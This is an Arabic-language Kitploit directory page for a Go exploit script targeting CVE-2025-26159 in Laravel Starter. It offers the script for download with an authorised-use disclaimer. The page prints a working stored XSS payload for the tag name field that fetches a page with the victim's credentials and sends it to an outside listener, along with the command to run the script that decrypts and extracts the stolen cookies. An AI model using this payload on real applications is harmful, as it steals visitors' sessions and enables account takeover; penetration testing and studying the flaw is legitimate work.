Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-26159 — نص استغلال قائم على Go لـ CVE-2025-26159 يفك تشفير ويفلتر ويستخرج ملفات تعريف الارتباط من تطبيقات Laravel عبر حقن حمولة XSS مخزنة. | Kitploit
أدوات/GitHubGitHub/godbadtry/cve-2025-26159
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

نص استغلال قائم على Go لـ CVE-2025-26159 يفك تشفير ويفلتر ويستخرج ملفات تعريف الارتباط من تطبيقات Laravel عبر حقن حمولة XSS مخزنة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-26159

يُستخدم هذا السكريبت فقط في البيئات المصرح بها حيث تم منح الإذن الصريح. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر أو عواقب ناتجة عن استخدام هذا السكريبت.

يقوم هذا السكريبت بفك التشفير والتصفية واستخراج ملفات تعريف الارتباط كجزء من استغلال CVE-2025-26159.

الاستخدام

لفهم خطوات الاستغلال، اطّلع على هذا المنشور على مدونتي.

root@kitploit:~
go run CVE-2025-26159.go

في حقل اسم العلامة (tag name) لمشروع Laravel Starter، أضف هذه الحمولة:

root@kitploit:~
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

بعد أن يزور المستخدم صفحة تفاصيل العلامة الخبيثة، ستحصل على ملفات تعريف الارتباط الخاصة به.

تنزيل الأداة